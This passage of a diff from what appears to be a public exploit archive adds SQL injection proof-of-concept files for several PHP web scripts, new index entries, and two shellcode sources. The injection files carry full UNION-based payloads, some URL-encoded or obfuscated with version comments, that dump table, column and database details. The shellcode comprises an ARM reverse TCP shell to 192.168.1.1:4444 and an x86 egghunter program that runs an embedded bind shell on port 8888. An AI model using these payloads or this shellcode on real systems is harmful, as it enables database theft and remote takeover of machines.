7%32%39%2c%30%78%32%38%33%38%32%39%29%2d%2d%20%2d
+# 
+# 3)
+# http://localhost/[PATH]/pagelist.php?id=[SQL]
+# 
+# 4)
+# http://localhost/[PATH]/page_new.php?id=[SQL]
+# 
+# # # # #

exploits/php/webapps/43916.txt

@@ -0,0 +1,25 @@
+# # # # # 
+# Exploit Title: Hot Scripts Clone Script 1.0 - SQL Injection
+# Dork: N/A
+# Date: 27.01.2018
+# Vendor Homepage: http://www.phpscriptsmall.com/
+# Software Link: http://www.exclusivescript.com/product/M72g4502563/php-scripts/hot-scripts-clone-:-script-classified
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 
+# Proof of Concept: 
+# 
+# http://localhost/[PATH]/categories?keyword=&mctid=[SQL]&subctid=[SQL]
+# 
+# -Y12h7890'++/*!08888UNION*/+/*!08888ALL*/+/*!08888SELECT*/+(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2))--+-
+#  
+# # # # #

exploits/php/webapps/43917.txt

@@ -0,0 +1,25 @@
+# # # # # 
+# Exploit Title: Multilanguage Real Estate MLM Script <= 3.0 - SQL Injection
+# Dork: N/A
+# Date: 27.01.2018
+# Vendor Homepage: http://www.phpscriptsmall.com/
+# Software Link: http://www.exclusivescript.com/product/y2OP4658391/php-scripts/multilanguage-real-estate-mlm-script
+# Version: <= 3.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 
+# Proof of Concept: 
+# 
+# http://localhost/[PATH]/product-list.php?srch=[SQL]
+# 
+# %73%66%64%27%29%20%20%2f%2a%21%30%38%38%38%38%55%4e%49%4f%4e%2a%2f%28%2f%2a%21%30%38%38%38%38%53%45%4c%45%43%54%2a%2f%20%28%31%29%2c%28%32%29%2c%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%28%34%29%29%2d%2d%20%2d
+# 
+# # # # #

exploits/php/webapps/43918.txt

@@ -0,0 +1,27 @@
+# # # # # 
+# Exploit Title: Vastal I-Tech Facebook Clone 2.9.9 - SQL Injection
+# Dork: N/A
+# Date: 27.01.2018
+# Vendor Homepage: http://vastal.com/
+# Software Link: http://vastal.com/buddy-zone-social-networking-script.html
+# Version: 2.9.9
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an users to inject sql commands....
+# 
+# Proof of Concept: 
+# 
+# http://localhost/[PATH]/chat_im/chat_window.php?request_id=[SQL]
+# 
+# -551++/*!13337UNION*/+/*!13337SELECT*/+1,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),3,4,5,6,7,8,9--+-
+# 
+# http://localhost/[PATH]/search_events.php?category=[SQL]
+# 
+# # # # #

files_exploits.csv

@@ -5479,6 +5479,8 @@ id,file,description,date,author,type,platform,port
 41629,exploits/windows/dos/41629.py,"FTPShell Client 6.53 - 'Session name' Local Buffer Overflow",2017-03-17,ScrR1pTK1dd13,dos,windows,
 41637,exploits/windows/dos/41637.py,"FTPShell Server 6.56 - 'ChangePassword' Buffer Overflow",2017-03-19,ScrR1pTK1dd13,dos,windows,
 41639,exploits/windows/dos/41639.txt,"ExtraPuTTY 0.29-RC2 - Denial of Service",2017-03-20,hyp3rlinx,dos,windows,
+43903,exploits/multiple/dos/43903.txt,"Artifex MuJS 1.0.2 - Denial of Service",2018-01-28,"Andrea Sindoni",dos,multiple,
+43904,exploits/multiple/dos/43904.txt,"Artifex MuJS 1.0.2 - Integer Overflow",2018-01-28,"Andrea Sindoni",dos,multiple,
 41643,exploits/hardware/dos/41643.txt,"Google Nest Cam 5.2.1
 - Buffer Overflow Conditions Over Bluetooth LE",2017-03-20,"Jason Doyle",dos,hardware,
 41645,exploits/windows/dos/41645.txt,"Microsoft Windows Kernel - Registry Hive Loading Crashes in nt!nt!HvpGetBinMemAlloc / nt!ExpFindAndRemoveTagBigPages (MS17-017)",2017-03-20,"Google Security Research",dos,windows,
 41646,exploits/windows/dos/41646.txt,"Microsoft Windows - Uniscribe Font Processing Out-of-Bounds Read in usp10!otlChainRuleSetTable::rule (MS17-011)",2017-03-20,"Google Security Research",dos,windows,
@@ -15965,7 +15967,8 @@ id,file,description,date,author,type,platform,port
 43519,exploits/php/remote/43519.rb,"phpCollab 2.5.1 - Unauthenticated File Upload (Metasploit)",2018-01-11,Metasploit,remote,php,
 43523,exploits/windows/remote/43523.py,"ALLMediaServer 0.95 - Buffer Overflow",2018-01-11,"Mario Kartone Ciccarelli",remote,windows,
 41638,exploits/windows/remote/41638.txt,"HttpServer 1.0 - Directory Traversal",2017-03-19,malwrforensics,remote,windows,
-43902,exploits/linux/remote/43902.py,"BMC BladeLogic 8.3.00.64 - Remote Command Execution",2018-01-26,"Paul Taylor",remote,linux,
+43902,exploits/multiple/remote/43902.py,"BMC BladeLogic 8.3.00.64 - Remote Command Execution",2018-01-26,"Paul Taylor",remote,multiple,
+43920,exploits/linux/remote/43920.py,"Trend Micro Threat Discovery Appliance 2.6.1062r1 - 'dlp_policy_upload.cgi' Remote Code Execution",2018-01-28,mr_me,remote,linux,
 41666,exploits/windows/remote/41666.py,"Disk Sorter Enterprise 9.5.12 - 'GET' Remote Buffer Overflow (SEH)",2017-03-22,"Daniel Teixeira",remote,windows,
 41672,exploits/windows/remote/41672.rb,"SysGauge 1.5.18 - SMTP Validation Buffer Overflow (Metasploit)",2017-02-28,Metasploit,remote,windows,
 41679,exploits/linux/remote/41679.rb,"Ceragon FibeAir IP-10 - SSH Private Key Exposure (Metasploit)",2015-04-01,Metasploit,remote,linux,22
@@ -37923,6 +37926,19 @@ id,file,description,date,author,type,platform,port
 43350,exploits/php/webapps/43350.txt,"Joomla! Component JB Visa 1.0 - 'visatype' SQL Injection",2017-12-18,"Ihsan Sencan",webapps,php,
 43351,exploits/php/webapps/43351.txt,"Joomla! Component Guru Pro - 'promocode' SQL Injection",2017-12-18,"Ihsan Sencan",webapps,php,
 43901,exploits/php/webapps/43901.txt,"WordPress Plugin Learning Management System - 'course_id' SQL Injection",2018-01-26,Esecurity.ir,webapps,php,
+43907,exploits/php/webapps/43907.txt,"PACSOne Server 6.6.2 DICOM Web Viewer - Directory Trasversal",2018-01-28,"Carlos Avila",webapps,php,
+43908,exploits/php/webapps/43908.txt,"PACSOne Server 6.6.2 DICOM Web Viewer - SQL Injection",2018-01-28,"Carlos Avila",webapps,php,
+43909,exploits/php/webapps/43909.html,"Gnew 2018.1 - Cross-Site Request Forgery",2018-01-28,"Cyril Vallicari",webapps,php,
+43911,exploits/multiple/webapps/43911.html,"Nexpose < 6.4.66 - Cross-Site Request Forgery",2018-01-28,"Shwetabh Vishnoi",webapps,multiple,
+43912,exploits/php/webapps/43912.html,"Joomla! Component JS Support Ticket 1.1.0 - Cross-Site Request Forgery",2018-01-28,"Ihsan Sencan",webapps,php,
+43913,exploits/php/webapps/43913.txt,"Joomla! Component Jtag Members Directory 5.3.7 - Arbitrary File Download",2018-01-28,"Ihsan Sencan",webapps,php,
+43914,exploits/php/webapps/43914.txt,"Task Rabbit Clone 1.0 - 'id' SQL Injection",2018-01-28,"Ihsan Sencan",webapps,php,
+43915,exploits/php/webapps/43915.txt,"TSiteBuilder 1.0 - SQL Injection",2018-01-28,"Ihsan Sencan",webapps,php,
+43916,exploits/php/webapps/43916.txt,"Hot Scripts Clone - 'subctid' SQL Injection",2018-01-28,"Ihsan Sencan",webapps,php,
+43917,exploits/php/webapps/43917.txt,"Multilanguage Real Estate MLM Script 3.0 - 'srch' SQL Injection",2018-01-28,"Ihsan Sencan",webapps,php,
+43918,exploits/php/webapps/43918.txt,"Buddy Zone 2.9.9 - SQL Injection",2018-01-28,"Ihsan Sencan",webapps,php,
+43919,exploits/hardware/webapps/43919.html,"Netis WF2419 Router - Cross-Site Request Forgery",2018-01-28,"Sajibe Kanti",webapps,hardware,
+43922,exploits/nodejs/webapps/43922.html,"KeystoneJS < 4.0.0-beta.7 - Cross-Site Request Forgery",2018-01-28,"Saurabh Banawar",webapps,nodejs,
 41641,exploits/php/webapps/41641.txt,"Joomla! Component JooCart 2.x - 'product_id' SQL Injection",2017-03-20,"Ihsan Sencan",webapps,php,
 41642,exploits/php/webapps/41642.txt,"Joomla! Component jCart for OpenCart 2.0 - 'product_id' SQL Injection",2017-03-20,"Ihsan Sencan",webapps,php,
 41644,exploits/php/webapps/41644.txt,"phplist 3.2.6 - SQL Injection",2017-03-20,"Curesec Research Team",webapps,php,80

files_shellcodes.csv

@@ -835,6 +835,8 @@ id,file,description,date,author,type,platform
 41631,shellcodes/linux_x86/41631.c,"Linux/x86 - Bind TCP (Random TCP Port) Shell (/bin/sh) Shellcode (44 bytes)",2017-03-17,"Oleg Boytsev",shellcode,linux_x86
 41635,shellcodes/linux_x86/41635.txt,"Linux/x86 - Read /etc/passwd Shellcode (54 bytes)",2017-03-19,WangYihang,shellcode,linux_x86
 43734,shellcodes/linux_x86/43734.c,"Linux/x86 - Insertion Decoder + Null-Free Shellcode (33+ bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86
+43910,shellcodes/linux_x86/43910.c,"Linux/x86 - Egghunter Shellcode (12 Bytes)",2018-01-28,"Nipun Jaswal",shellcode,linux_x86
+43921,shellcodes/arm/43921.asm,"Linux/ARM - Reverse TCP (192.168.1.1:4444/TCP) Shell (/bin/sh) Null Free Shellcode (80 bytes)",2018-01-28,rtmcx,shellcode,arm
 42295,shellcodes/linux_x86/42295.c,"Linux/x86 - Reverse TCP (127.1.1.1:11111/TCP) Shell + Null-Free Shellcode (67 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86
 41723,shellcodes/linux_x86/41723.c,"Linux/x86 - Reverse TCP (192.168.3.119:54321/TCP) Shell (/bin/bash) Shellcode (110 bytes)",2017-03-24,JR0ch17,shellcode,linux_x86
 41750,shellcodes/linux_x86-64/41750.asm,"Linux/x64 - execve(/bin/sh) Shellcode (21 bytes)",2017-03-28,WangYihang,shellcode,linux_x86-64

shellcodes/arm/43921.asm

@@ -0,0 +1,78 @@
+/*
+* Title:  Linux/ARM - Reverse Shell TCP (/bin/sh). Null free shellcode (80 bytes)
+* Date:   2018-01-25
+* Tested: armv7l (Raspberry Pi v3)
+* Author: rtmcx - twitter: @rtmcx 
+*/
+
+.section .text
+
+.global _start
+
+_start:
+/* Enter Thumb mode */
+	.ARM
+	add	r3, pc, #1
+	bx	r3
+
+
+	.THUMB
+
+/* Create a new socket*/
+	mov		r0, #2				// PF_INET = 2
+	mov		r1, #1				// SOCK_STREAM = 1
+	eor		r2, r2, r2			// Zero out r2
+	mov 	r7, #100			// Put 281 in r7..
+	add		r7, #181			// ..in a 2-step operation
+	svc		#1					// syscall returns sockid in r0 
+
+	mov		r4, r0				// Save sockid in r4
+
+
+/* Connect to client */
+	adr 	r1, struct_addr		// Address to struct_addr
+	strb	r2, [r1, #1]		// Replace AF_INET with NULL
+	mov 	r2, #16				// Address length 
+	add 	r7, #2				// r7 already contains 281, so add 2 = 283
+	svc 	#1					// Client sockid will be returned in r0
+	
+
+/* Duplicate STDIN, STDOUT and STERR */
+	mov 	r0, r4				// Saved sockid
+	eor 	r1, r1, r1			// Zero r1 for STDIN
+	mov		r7, #63				// Syscall for dup2
+	svc 	#1					// Execute syscall
+	
+	mov 	r0, r4				// Saved sockid
+	add 	r1, #1				// STDOUT (1)
+	svc		#1					// Execute syscall
+
+	mov 	r0, r4				// Saved sockid
+	add 	r1, #1				// STDERR (2)
+	svc		#1					// Execute syscall
+
+	
+/* Execute shell */
+	adr 	r0, shellcode		// Address to "/bin/sh"
+	eor		r1, r1, r1			// Zero out r1
+	eor		r2, r2, r2			// And r2
+	strb	r2, [r0, #7]		// Replace 'X' with NULL
+	mov		r7, #11				// Syscall for execve
+	svc 	#1					// Execute syscall
+
+
+struct_addr:
+	.ascii "\x02\xaa"			// AF_INET 0xff will be NULLed 
+	.ascii "\x11\x5c"			// port 4444
+	.ascii "\xc0\xa8\x01\x01" 	// IP Address (192.168.1.1)
+
+shellcode:
+	.ascii "/bin/shX"
+
+/*
+Compile and link with: 
+# as -o shellcode.o shellcode.s
+# ld -N shellcode.o -o shellcode
+
+\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x02\x20\x01\x21\x52\x40\xc8\x27\x51\x37\x01\xdf\x04\x1c\x0a\xa1\x4a\x70\x10\x22\x02\x37\x01\xdf\x20\x1c\x49\x40\x3f\x27\x01\xdf\x20\x1c\x01\x31\x01\xdf\x20\x1c\x01\x31\x01\xdf\x04\xa0\x49\x40\x52\x40\xc2\x71\x0b\x27\x01\xdf\x02\xff\x11\x5c\xc0\xa8\x01\x01\x2f\x62\x69\x6e\x2f\x73\x68\x58
+*/

shellcodes/linux_x86/43910.c

@@ -0,0 +1,49 @@
+/*
+Title: Linux/x86 - EggHunter Shellcode (12 Bytes)
+Description: Smallest Null-Free Egg Hunter Shellcode - 12 Bytes
+Date : 14/Jan/2018
+Author: Nipun Jaswal (@nipunjaswal) ; SLAE-1080
+
+Details:
+1. Works with an executable EGG
+2. Make sure you clear EDX, EAX registers in the shellcode before any other operations
+*/
+/*
+
+EGG Hunter Disassembly:
+Disassembly of section .text:
+
+08048060 <_start>:
+ 8048060:	ba 90 47 90 4f       	mov    edx,0x4f904790
+
+08048065 <loop>:
+ 8048065:	40                   	inc    eax
+ 8048066:	39 10                	cmp    DWORD PTR [eax],edx
+ 8048068:	75 fb                	jne    8048065 <loop>
+ 804806a:	ff e0                	jmp    eax
+*/
+#include <stdio.h>
+#include <string.h>
+#define EXECEGG "\x90\x47\x90\x4f" //Executable EGG
+
+unsigned char egg_hunter[] = \
+"\xba\x90\x47\x90\x4f\x40\x39\x10\x75\xfb\xff\xe0"; //EggHunter 12 Bytes
+unsigned char egg[] = \
+EXECEGG
+// Bind TCP Shell 112 Bytes Port 8888
+"\x31\xdb\x31\xc0\xb0\x66\xfe\xc3\x56\x6a\x01\x6a"
+"\x02\x89\xe1\xcd\x80\x97\x56\x66\x68\x22\xb8\x66"
+"\x6a\x02\x89\xe3\x6a\x10\x53\x57\x31\xdb\xf7\xe3"
+"\xb0\x66\xb3\x02\x89\xe1\xcd\x80\x56\x57\x31\xdb"
+"\xf7\xe3\xb0\x66\xb3\x04\x89\xe1\xcd\x80\x31\xdb"
+"\xf7\xe3\x56\x56\x57\xb0\x66\xb3\x05\x89\xe1\xcd"
+"\x80\x93\x31\xc9\xb1\x02\xb0\x3f\xcd\x80\x49\x79"
+"\xf9\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62"
+"\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80";
+void main()
+{
+    printf("Length of Egg Hunter Shellcode:  %d\n", strlen(egg_hunter));
+    printf("Length of the Actual Shellcode:  %d\n", strlen(egg));
+    int (*ret)() = (int(*)())egg_hunter;
+    ret();
+}